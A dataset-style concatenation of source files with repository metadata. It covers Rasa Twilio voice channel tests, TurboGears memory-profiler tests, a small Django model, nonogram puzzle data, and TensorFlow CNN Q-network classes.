be2a7efa45e0df8dafe94e4decf964cd6b6f98ea | 10,934 | py | Python | tests/core/channels/test_twilio_voice.py | fintzd/rasa | 6359be5509c7d87cd29c2ab5149bc45e843fea85 | [
"Apache-2.0"
] | 9,701 | 2019-04-16T15:46:27.000Z | 2022-03-31T11:52:18.000Z | tests/core/channels/test_twilio_voice.py | fintzd/rasa | 6359be5509c7d87cd29c2ab5149bc45e843fea85 | [
"Apache-2.0"
] | 6,420 | 2019-04-16T15:58:22.000Z | 2022-03-31T17:54:35.000Z | tests/core/channels/test_twilio_voice.py | fintzd/rasa | 6359be5509c7d87cd29c2ab5149bc45e843fea85 | [
"Apache-2.0"
] | 3,063 | 2019-04-16T15:23:52.000Z | 2022-03-31T00:01:12.000Z | import logging
import pytest
from http import HTTPStatus
from rasa import server
from rasa.core.agent import Agent
from rasa.core.channels import channel
from rasa.shared.exceptions import InvalidConfigException, RasaException
from rasa.core.channels.twilio_voice import TwilioVoiceInput
from rasa.core.channels.twilio_voice import TwilioVoiceCollectingOutputChannel
from typing import Text, Any, Dict, Type
logger = logging.getLogger(__name__)
async def test_twilio_voice_twiml_response_text():
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_text_message(recipient_id="Chuck Norris", text="Test:")
assert len(output_channel.messages) == 1
assert output_channel.messages[0]["text"] == "Test:"
twiml = tv._build_twilio_voice_response(output_channel.messages)
assert (
str(twiml) == '<?xml version="1.0" encoding="UTF-8"?><Response>'
'<Gather action="/webhooks/twilio_voice/webhook" '
'actionOnEmptyResult="true" enhanced="false" input="speech" '
'speechModel="default" speechTimeout="5"><Say voice="woman">'
"Test:</Say></Gather></Response>"
)
async def test_twilio_voice_twiml_response_buttons():
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_text_with_buttons(
recipient_id="Chuck Norris",
text="Buttons:",
buttons=[
{"title": "Yes", "payload": "/affirm"},
{"title": "No", "payload": "/deny"},
],
)
assert len(output_channel.messages) == 3
message_str = " ".join([m["text"] for m in output_channel.messages])
assert message_str == "Buttons: Yes No"
twiml = tv._build_twilio_voice_response(output_channel.messages)
assert (
str(twiml) == '<?xml version="1.0" encoding="UTF-8"?><Response>'
'<Say voice="woman">Buttons:</Say><Pause length="1" />'
'<Say voice="woman">Yes</Say><Pause length="1" />'
'<Gather action="/webhooks/twilio_voice/webhook" '
'actionOnEmptyResult="true" enhanced="false" input="speech" '
'speechModel="default" speechTimeout="5">'
'<Say voice="woman">No</Say></Gather></Response>'
)
@pytest.mark.parametrize(
"configs, expected",
[
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "alien",
"enhanced": "false",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "not a number",
"assistant_voice": "woman",
"enhanced": "false",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "auto",
"assistant_voice": "woman",
"enhanced": "wrong",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "true",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"assistant_voice": "woman",
"enhanced": "true",
"speech_model": "default",
"speech_timeout": "auto",
},
InvalidConfigException,
),
(
{
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"assistant_voice": "woman",
"enhanced": "true",
"speech_model": "phone_call",
"speech_timeout": "auto",
},
InvalidConfigException,
),
],
)
def test_invalid_configs(configs: Dict[Text, Any], expected: Type[RasaException]):
with pytest.raises(expected):
TwilioVoiceInput(**configs)
async def test_twilio_voice_remove_image():
with pytest.warns(UserWarning):
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_response(
recipient_id="Chuck Norris",
message={"image": "https://i.imgur.com/nGF1K8f.jpg", "text": "Some text."},
)
async def test_twilio_voice_keep_image_text():
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_response(
recipient_id="Chuck Norris",
message={"image": "https://i.imgur.com/nGF1K8f.jpg", "text": "Some text."},
)
assert len(output_channel.messages) == 1
assert output_channel.messages[0]["text"] == "Some text."
async def test_twilio_emoji_warning():
with pytest.warns(UserWarning):
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_response(
recipient_id="User", message={"text": "Howdy 😀"}
)
async def test_twilio_voice_multiple_responses():
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
output_channel = TwilioVoiceCollectingOutputChannel()
await output_channel.send_text_message(
recipient_id="Chuck Norris", text="message 1"
)
await output_channel.send_text_message(
recipient_id="Chuck Norris", text="message 2"
)
assert len(output_channel.messages) == 2
assert output_channel.messages[0]["text"] == "message 1"
assert output_channel.messages[1]["text"] == "message 2"
twiml = tv._build_twilio_voice_response(output_channel.messages)
assert (
str(twiml) == '<?xml version="1.0" encoding="UTF-8"?><Response>'
'<Say voice="woman">message 1</Say><Pause length="1" />'
'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
'<Say voice="woman">message 2</Say></Gather></Response>'
)
async def test_twilio_receive_answer(stack_agent: Agent):
app = server.create_app(agent=stack_agent)
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
channel.register([tv], app, "/webhooks/")
client = app.asgi_client
body = {"From": "Tobias", "CallStatus": "ringing"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
# Actual test xml content
assert (
response.body == b'<?xml version="1.0" encoding="UTF-8"?><Response>'
b'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
b'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
b'<Say voice="woman">hey there None!</Say></Gather></Response>'
)
async def test_twilio_receive_no_response(stack_agent: Agent):
app = server.create_app(agent=stack_agent)
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
channel.register([tv], app, "/webhooks/")
client = app.asgi_client
body = {"From": "Matthew", "CallStatus": "ringing"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
assert response.body
body = {"From": "Matthew", "CallStatus": "answered"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
assert (
response.body == b'<?xml version="1.0" encoding="UTF-8"?><Response>'
b'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
b'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
b'<Say voice="woman">hey there None!</Say></Gather></Response>'
)
async def test_twilio_receive_no_previous_response(stack_agent: Agent):
app = server.create_app(agent=stack_agent)
inputs = {
"initial_prompt": "hello",
"reprompt_fallback_phrase": "i didn't get that",
"speech_model": "default",
"speech_timeout": "5",
"assistant_voice": "woman",
"enhanced": "false",
}
tv = TwilioVoiceInput(**inputs)
channel.register([tv], app, "/webhooks/")
client = app.asgi_client
body = {"From": "Ray", "CallStatus": "answered"}
_, response = await client.post(
"/webhooks/twilio_voice/webhook",
headers={"Content-type": "application/x-www-form-urlencoded"},
data=body,
)
assert response.status == HTTPStatus.OK
assert (
response.body == b'<?xml version="1.0" encoding="UTF-8"?><Response>'
b'<Gather action="/webhooks/twilio_voice/webhook" actionOnEmptyResult="true" '
b'enhanced="false" input="speech" speechModel="default" speechTimeout="5">'
b'<Say voice="woman">i didn\'t get that</Say></Gather></Response>'
)
| 32.933735 | 87 | 0.597768 | 1,105 | 10,934 | 5.732127 | 0.149321 | 0.05131 | 0.012314 | 0.018472 | 0.848753 | 0.817019 | 0.807547 | 0.774866 | 0.768235 | 0.768235 | 0 | 0.006535 | 0.258277 | 10,934 | 331 | 88 | 33.033233 | 0.774353 | 0.002104 | 0 | 0.620438 | 0 | 0 | 0.362086 | 0.138693 | 0 | 0 | 0 | 0 | 0.072993 | 1 | 0.00365 | false | 0 | 0.036496 | 0 | 0.040146 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07851db85005579d4b212bad7904bf16717fe404 | 168 | py | Python | diff_cover/__init__.py | singingwolfboy/diff-cover | e270af76416a536de1c63e4dfcd0f9bd94762668 | [
"Apache-2.0"
] | null | null | null | diff_cover/__init__.py | singingwolfboy/diff-cover | e270af76416a536de1c63e4dfcd0f9bd94762668 | [
"Apache-2.0"
] | null | null | null | diff_cover/__init__.py | singingwolfboy/diff-cover | e270af76416a536de1c63e4dfcd0f9bd94762668 | [
"Apache-2.0"
] | null | null | null | VERSION = '0.7.3'
DESCRIPTION = 'Automatically find diff lines that need test coverage.'
QUALITY_DESCRIPTION = 'Automatically find diff lines with quality violations.'
| 42 | 78 | 0.791667 | 22 | 168 | 6 | 0.727273 | 0.363636 | 0.424242 | 0.484848 | 0.560606 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 0.130952 | 168 | 3 | 79 | 56 | 0.883562 | 0 | 0 | 0 | 0 | 0 | 0.672619 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07f83868dc7101b04b92dc93024bd5dd2fd8259a | 153 | py | Python | Django01/App/models.py | littlelittlepoint/LittleTeam | 6aebb6239e5d9cfc419adbd3c9117172be67c0f4 | [
"Apache-2.0"
] | 1 | 2018-08-17T12:11:38.000Z | 2018-08-17T12:11:38.000Z | Django01/App/models.py | littlelittlepoint/LittleTeam | 6aebb6239e5d9cfc419adbd3c9117172be67c0f4 | [
"Apache-2.0"
] | null | null | null | Django01/App/models.py | littlelittlepoint/LittleTeam | 6aebb6239e5d9cfc419adbd3c9117172be67c0f4 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Student(models.Model):
s_name = models.CharField(max_length=32),
s_class = models.CharField(max_length=16),
| 21.857143 | 46 | 0.745098 | 23 | 153 | 4.782609 | 0.652174 | 0.272727 | 0.327273 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030534 | 0.143791 | 153 | 6 | 47 | 25.5 | 0.80916 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
07fd15a558a55cbac4fa9c9b7704a2bbafd9c936 | 6,153 | py | Python | turbogears/tests/test_memory_profiler_setup.py | timmartin19/turbogears | b5420cb7e55757d418d8fadb512dbd7803c4279c | [
"MIT"
] | null | null | null | turbogears/tests/test_memory_profiler_setup.py | timmartin19/turbogears | b5420cb7e55757d418d8fadb512dbd7803c4279c | [
"MIT"
] | 9 | 2015-01-27T19:13:56.000Z | 2019-03-29T14:44:31.000Z | turbogears/tests/test_memory_profiler_setup.py | timmartin19/turbogears | b5420cb7e55757d418d8fadb512dbd7803c4279c | [
"MIT"
] | 13 | 2015-04-14T14:15:53.000Z | 2020-03-18T01:05:46.000Z | from unittest import TestCase
from turbogears.memory_profiler_setup import _get_state_from_pipe_command, MemoryProfilerState, _process_fifo_input, \
get_memory_profile_logging_on, _is_pympler_profiling_value_on, _set_pympler_profiling_value
from mock import MagicMock
from hamcrest import assert_that, equal_to
class TestMemoryProfilerSetup(TestCase):
def test__get_state_from_pipe_command_unknown(self):
state, params = _get_state_from_pipe_command('sometrash')
assert_that(state, equal_to(MemoryProfilerState.UNKNOWN))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_on(self):
state, params = _get_state_from_pipe_command('on')
assert_that(state, equal_to(MemoryProfilerState.ON))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('ON')
assert_that(state, equal_to(MemoryProfilerState.ON))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('On')
assert_that(state, equal_to(MemoryProfilerState.ON))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_off(self):
state, params = _get_state_from_pipe_command('off')
assert_that(state, equal_to(MemoryProfilerState.OFF))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('OFF')
assert_that(state, equal_to(MemoryProfilerState.OFF))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('Off')
assert_that(state, equal_to(MemoryProfilerState.OFF))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_echo(self):
state, params = _get_state_from_pipe_command('echo')
assert_that(state, equal_to(MemoryProfilerState.ECHO))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('ECHO')
assert_that(state, equal_to(MemoryProfilerState.ECHO))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('Echo')
assert_that(state, equal_to(MemoryProfilerState.ECHO))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_pympler(self):
# no additional paramteres
state, params = _get_state_from_pipe_command('pympler')
assert_that(state, equal_to(MemoryProfilerState.UNKNOWN))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint on')
assert_that(state, equal_to(MemoryProfilerState.PYMPLER))
assert_that(params, equal_to({'endpoint': 'some_controller.someendpoint', 'persistence': 'on'}))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint once')
assert_that(state, equal_to(MemoryProfilerState.PYMPLER))
assert_that(params, equal_to({'endpoint': 'some_controller.someendpoint', 'persistence': 'once'}))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint off')
assert_that(state, equal_to(MemoryProfilerState.PYMPLER))
assert_that(params, equal_to({'endpoint': 'some_controller.someendpoint', 'persistence': 'off'}))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint nonsense')
assert_that(state, equal_to(MemoryProfilerState.UNKNOWN))
assert_that(params, equal_to(None))
def test_toggle_memory_profile_via_fifo_on(self):
thread_logger = MagicMock(info=MagicMock())
config_fifo = MagicMock(readline=MagicMock(return_value='ON\n'))
_process_fifo_input(thread_logger, config_fifo)
assert_that(get_memory_profile_logging_on(), equal_to(True))
def test_toggle_memory_profile_via_fifo_off(self):
thread_logger = MagicMock(info=MagicMock())
config_fifo = MagicMock(readline=MagicMock(return_value='OFF\n'))
_process_fifo_input(thread_logger, config_fifo)
assert_that(get_memory_profile_logging_on(), equal_to(False))
def test_toggle_memory_profile_via_fifo_pympler_add_enpoint_once(self):
thread_logger = MagicMock(info=MagicMock())
endpoint_path = 'magic_controller.end_point'
config_fifo = MagicMock(readline=MagicMock(return_value='ON\n'))
_process_fifo_input(thread_logger, config_fifo)
config_fifo = MagicMock(readline=MagicMock(return_value='pympler {} ONCE\n'.format(endpoint_path)))
_process_fifo_input(thread_logger, config_fifo)
assert_that(get_memory_profile_logging_on(), equal_to(True))
assert_that(_is_pympler_profiling_value_on(endpoint_path), equal_to(True))
def test_pympler_profiling_value_management(self):
_set_pympler_profiling_value('test1', 'on')
_set_pympler_profiling_value('test2', 'ON')
_set_pympler_profiling_value('test3', 'On')
_set_pympler_profiling_value('test4', 'ONCE')
_set_pympler_profiling_value('test5', 'once')
_set_pympler_profiling_value('test6', 'once')
# can get more then once
assert_that(_is_pympler_profiling_value_on('test1'), equal_to(True))
assert_that(_is_pympler_profiling_value_on('test1'), equal_to(True))
# can turn off
assert_that(_is_pympler_profiling_value_on('test2'), equal_to(True))
_set_pympler_profiling_value('test2', 'off')
assert_that(_is_pympler_profiling_value_on('test2'), equal_to(False))
# can read capitalized
assert_that(_is_pympler_profiling_value_on('test3'), equal_to(True))
# can read only once
assert_that(_is_pympler_profiling_value_on('test4'), equal_to(True))
assert_that(_is_pympler_profiling_value_on('test4'), equal_to(False))
# can read lower case
assert_that(_is_pympler_profiling_value_on('test5'), equal_to(True))
# can turn off a one time execution profiler
_set_pympler_profiling_value('test6', 'off')
assert_that(_is_pympler_profiling_value_on('test6'), equal_to(False))
| 53.043103 | 118 | 0.737039 | 783 | 6,153 | 5.302682 | 0.114943 | 0.105973 | 0.060694 | 0.080925 | 0.864403 | 0.782274 | 0.762524 | 0.703757 | 0.670761 | 0.670761 | 0 | 0.003317 | 0.167073 | 6,153 | 115 | 119 | 53.504348 | 0.806829 | 0.026491 | 0 | 0.430108 | 0 | 0 | 0.087444 | 0.037118 | 0 | 0 | 0 | 0 | 0.473118 | 1 | 0.096774 | false | 0 | 0.043011 | 0 | 0.150538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6af1b72d366ebdf693f2b6c9861bf6b4a0aac8e1 | 1,528 | py | Python | google_or_tools/nonogram_pbn_bucks.py | Wikunia/hakank | 030bc928d2efe8dcbc5118bda3f8ae9575d0fd13 | [
"MIT"
] | 279 | 2015-01-10T09:55:35.000Z | 2022-03-28T02:34:03.000Z | google_or_tools/nonogram_pbn_bucks.py | Wikunia/hakank | 030bc928d2efe8dcbc5118bda3f8ae9575d0fd13 | [
"MIT"
] | 10 | 2017-10-05T15:48:50.000Z | 2021-09-20T12:06:52.000Z | google_or_tools/nonogram_pbn_bucks.py | Wikunia/hakank | 030bc928d2efe8dcbc5118bda3f8ae9575d0fd13 | [
"MIT"
] | 83 | 2015-01-20T03:44:00.000Z | 2022-03-13T23:53:06.000Z | # webpbn.com Puzzle #27: Party at the Right [Political]
# Copyright 2004 by Jan Wolter
#
rows = 23
row_rule_len = 8
row_rules = [
[0, 0, 0, 0, 0, 0, 0, 11],
[0, 0, 0, 0, 0, 0, 0, 17],
[0, 0, 0, 0, 3, 5, 5, 3],
[0, 0, 0, 0, 2, 2, 2, 1],
[0, 2, 1, 3, 1, 3, 1, 4],
[0, 0, 0, 0, 3, 3, 3, 3],
[0, 5, 1, 3, 1, 3, 1, 3],
[0, 0, 0, 0, 3, 2, 2, 4],
[0, 0, 0, 0, 5, 5, 5, 5],
[0, 0, 0, 0, 0, 0, 0, 23],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 23],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 2, 1],
[0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 1, 10, 1, 2, 1],
[0, 1, 1, 1, 1, 1, 1, 3],
[1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 2, 2],
[0, 0, 0, 0, 0, 5, 5, 3]
]
cols = 27
col_rule_len = 6
col_rules = [
[0, 0, 0, 0, 4, 12],
[0, 0, 0, 6, 1, 1],
[0, 0, 0, 8, 1, 1],
[0, 3, 2, 2, 1, 1],
[2, 1, 1, 2, 1, 6],
[0, 0, 1, 1, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 3, 2, 3, 1, 1],
[0, 0, 0, 10, 1, 1],
[0, 4, 2, 2, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 0, 2, 1, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 3, 2, 3, 1, 6],
[0, 0, 0, 10, 1, 1],
[0, 4, 2, 2, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 0, 1, 1, 1, 9],
[2, 1, 1, 2, 1, 1],
[0, 2, 2, 3, 1, 3],
[0, 0, 0, 8, 1, 5],
[0, 0, 0, 6, 1, 1],
[0, 0, 0, 4, 9, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 2, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 4]
]
| 24.253968 | 55 | 0.310864 | 376 | 1,528 | 1.24734 | 0.093085 | 0.45629 | 0.479744 | 0.400853 | 0.692964 | 0.573561 | 0.486141 | 0.434968 | 0.379531 | 0.341151 | 0 | 0.390608 | 0.38678 | 1,528 | 62 | 56 | 24.645161 | 0.109925 | 0.05301 | 0 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed2b21fd06ec0808da42e448a2911351887fe8ed | 5,591 | py | Python | example_model/value/cnn/discrete.py | SunandBean/tensorflow_RL | a248cbfb99b2041f6f7cc008fcad53fb83ac486e | [
"MIT"
] | 60 | 2019-01-29T14:13:00.000Z | 2020-11-24T09:08:05.000Z | example_model/value/cnn/discrete.py | SunandBean/tensorflow_RL | a248cbfb99b2041f6f7cc008fcad53fb83ac486e | [
"MIT"
] | 2 | 2019-08-14T06:44:32.000Z | 2020-11-12T12:57:55.000Z | example_model/value/cnn/discrete.py | SunandBean/tensorflow_RL | a248cbfb99b2041f6f7cc008fcad53fb83ac486e | [
"MIT"
] | 37 | 2019-01-22T05:19:34.000Z | 2021-04-12T02:27:50.000Z | import tensorflow as tf
import numpy as np
class CNNQRDQN:
def __init__(self, name, window_size, obs_stack, output_size, num_support):
self.window_size = window_size
self.obs_stack = obs_stack
self.output_size = output_size
self.num_support = num_support
with tf.variable_scope(name):
self.input = tf.placeholder(tf.float32, shape=[None, self.window_size, self.window_size, self.obs_stack])
self.conv1 = tf.layers.conv2d(inputs=self.input, filters=32, kernel_size=[8, 8], strides=[4, 4], padding='VALID', activation=tf.nn.relu)
self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=[2, 2], padding='VALID', activation=tf.nn.relu)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=[1, 1], padding='VALID', activation=tf.nn.relu)
self.reshape = tf.reshape(self.conv3, [-1, 7 * 7 * 64])
self.l1 = tf.layers.dense(inputs=self.reshape, units=512, activation=tf.nn.relu)
self.l2 = tf.layers.dense(inputs=self.l1, units=self.output_size * self.num_support, activation=None)
self.net = tf.reshape(self.l2, [-1, self.output_size, self.num_support])
self.scope = tf.get_variable_scope().name
def get_variables(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
class CNNIQN:
def __init__(self, name, window_size, obs_stack, output_size, num_support, batch_size):
self.window_size = window_size
self.obs_stack = obs_stack
self.output_size = output_size
self.num_support = num_support
self.batch_size = batch_size
self.quantile_embedding_dim = 128
with tf.variable_scope(name):
self.input = tf.placeholder(tf.float32, shape=[None, self.window_size, self.window_size, self.obs_stack])
self.input_expand = tf.expand_dims(self.input, axis=1)
self.input_tile = tf.tile(self.input_expand, [1, self.num_support, 1, 1, 1])
self.input_reshape = tf.reshape(self.input_tile, [-1, self.window_size, self.window_size, self.obs_stack])
self.conv1 = tf.layers.conv2d(inputs=self.input_reshape, filters=32, kernel_size=[8, 8], strides=[4, 4], padding='VALID', activation=tf.nn.relu)
self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=[2, 2], padding='VALID', activation=tf.nn.relu)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=[1, 1], padding='VALID', activation=tf.nn.relu)
self.reshape = tf.reshape(self.conv3, [-1, 7 * 7 * 64])
self.l1 = tf.layers.dense(inputs=self.reshape, units=self.quantile_embedding_dim, activation=tf.nn.relu)
self.tau = tf.placeholder(tf.float32, [None, self.num_support])
self.tau_reshape = tf.reshape(self.tau, [-1, 1])
self.pi_mtx = tf.constant(np.expand_dims(np.pi * np.arange(0, 64), axis=0), dtype=tf.float32)
self.cos_tau = tf.cos(tf.matmul(self.tau_reshape, self.pi_mtx))
self.phi = tf.layers.dense(inputs=self.cos_tau, units=self.quantile_embedding_dim, activation=tf.nn.relu)
self.net_sum = tf.multiply(self.l1, self.phi)
self.net_l1 = tf.layers.dense(inputs=self.net_sum, units=512, activation=tf.nn.relu)
self.net_l2 = tf.layers.dense(inputs=self.net_l1, units=256, activation=tf.nn.relu)
self.net_l3 = tf.layers.dense(inputs=self.net_l2, units=self.output_size, activation=None)
self.net_action = tf.transpose(tf.split(self.net_l3, 1, axis=0), perm=[0, 2, 1])
self.net = tf.transpose(tf.split(self.net_l3, self.batch_size, axis=0), perm=[0, 2, 1])
self.scope = tf.get_variable_scope().name
def get_variables(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
class CNNDQN:
def __init__(self, name, window_size, obs_stack, output_size):
self.window_size = window_size
self.obs_stack = obs_stack
self.output_size = output_size
with tf.variable_scope(name):
self.input = tf.placeholder(tf.float32, shape=[None, self.window_size, self.window_size, self.obs_stack])
self.conv1 = tf.layers.conv2d(inputs=self.input, filters=32, kernel_size=[8, 8], strides=[4, 4], padding='VALID', activation=tf.nn.relu)
self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=[2, 2], padding='VALID', activation=tf.nn.relu)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=[1, 1], padding='VALID', activation=tf.nn.relu)
self.reshape = tf.reshape(self.conv3, [-1, 7 * 7 * 64])
self.dense_3 = tf.layers.dense(inputs=self.reshape, units=512, activation=tf.nn.relu)
self.Q = tf.layers.dense(inputs=self.dense_3, units=self.output_size, activation=None)
self.scope = tf.get_variable_scope().name
def get_variables(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
| 61.43956 | 156 | 0.66929 | 822 | 5,591 | 4.381995 | 0.113139 | 0.039978 | 0.058301 | 0.074958 | 0.838701 | 0.82593 | 0.772071 | 0.721544 | 0.721544 | 0.721544 | 0 | 0.035111 | 0.195135 | 5,591 | 90 | 157 | 62.122222 | 0.765333 | 0 | 0 | 0.581081 | 0 | 0 | 0.008049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121622 | false | 0 | 0.027027 | 0.081081 | 0.27027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed4cf79b68807c6e6f762cc39a4b1615dc109854 | 82 | py | Python | data_tests/saved__backend__py3.9/pythran/no_arg.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | [
"BSD-3-Clause"
] | 88 | 2019-01-08T16:39:08.000Z | 2022-02-06T14:19:23.000Z | data_tests/saved__backend__/pythran/no_arg.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | [
"BSD-3-Clause"
] | 13 | 2019-06-20T15:53:10.000Z | 2021-02-09T11:03:29.000Z | data_tests/saved__backend__/pythran/no_arg.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | [
"BSD-3-Clause"
